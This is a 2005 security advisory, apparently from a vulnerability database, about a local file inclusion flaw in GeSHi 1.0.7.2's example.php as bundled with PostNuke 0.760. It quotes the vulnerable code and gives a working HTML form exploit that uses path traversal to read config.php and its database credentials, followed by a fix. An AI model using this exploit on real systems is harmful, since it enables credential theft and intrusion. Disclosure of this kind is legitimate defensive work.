Bug: GeSHi 1.0.7.2 Local file inclusion ( Ascii Version )

Search:
WLB2

GeSHi 1.0.7.2 Local file inclusion

Published
Credit
Risk
2005.09.30
Anonymous
Medium
CWE
CVE
Local
Remote
CWE-98
CVE-2005-3080
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

[GeSHi Local PHP file inclusion 1.0.7.2]

Author: Maksymilian Arciemowicz ( cXIb8O3 ).17
Date: 21.9.2005

- --- 0.Description ---

GeSHi started as a mod for the phpBB forum system, to enable highlighting of more languages than the available (which
was 0 ;)). However, it quickly spawned into an entire project on its own. But now it has been released, work continues
on a mod for phpBB - and hopefully for many forum systems, blogs and other web-based systems.

Several systems are using GeSHi now, including:

PostNuke - A popular open source CMS
Docuwiki - An advanced wiki engine
gtk.php.net - Their manual uses GeSHi for syntax highlighting
WordPress - A powerful blogging system
PHP-Fusion - A constantly evovling CMS
SQL Manager - A Postgres DBAL
Mambo - A popular open source CMS
MediaWiki - A leader in Wikis
TikiWiki - A megapowerful Wiki/CMS, and one I personally use
RWeb - A site-building tool


- --- 1. Local (PHP) file inclusion ---
I have found one bug in file ./contrib/example.php
This file exists in standart packet GeSHi.
In file:

- -10-18-line---
include('../geshi.php');
if ( isset($_POST['submit']) )
{
if ( get_magic_quotes_gpc() ) $_POST['source'] = stripslashes($_POST['source']);
if ( !strlen(trim($_POST['source'])) )
{
$_POST['source'] = implode('', @file('../geshi/' . $_POST['language'] . '.php'));
$_POST['language'] = 'php';
}
- -10-18-line---

Ok.. so, if exists variable $_POST['submit'] and $_POST['language'], you can read any php file
(for example in postnuke -config.php-).
You need use varible $_POST['language'] wher is path to php file.
I have tested this bug in GeSHi package and in PostNuke 0.760.

PostNuke 0.760 (file: ./modules/pn_bbcode/pnincludes/contrib/example.php)

We can read config.php in PostNuke where we have login, password, dbname and dbhost.
All variables needed to log in to database.
So we can just use this exploit below :

- --- EXPLOIT TESTED IN POSTNUKE 0.760 ---
<center><a href="http://cxsecurity.com" target="http://cxsecurity.com/"><img
src="http://cxsecurity.com/gfx/small_logo.png"></a><p>
<form action="http://[HOST]/modules/pn_bbcode/pnincludes/contrib/example.php" method="post">
Path to file:<br>
example: <b>../../../../config</b><br>
<textarea name="language"></textarea><br>
<input type="submit" name="submit" value="See">
</form>
- --- EXPLOIT FOR POSTNUKE 0.760 ---

[HOST] = example. http://www.cxsecurity.com/postnuke/html
any questions? ;]

- --- 2. How to fix ---
Patch
http://cxsecurity.com/patch/2
works in PostNuke 0.760

or new version of script 1.0.7.3

- --- 3.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version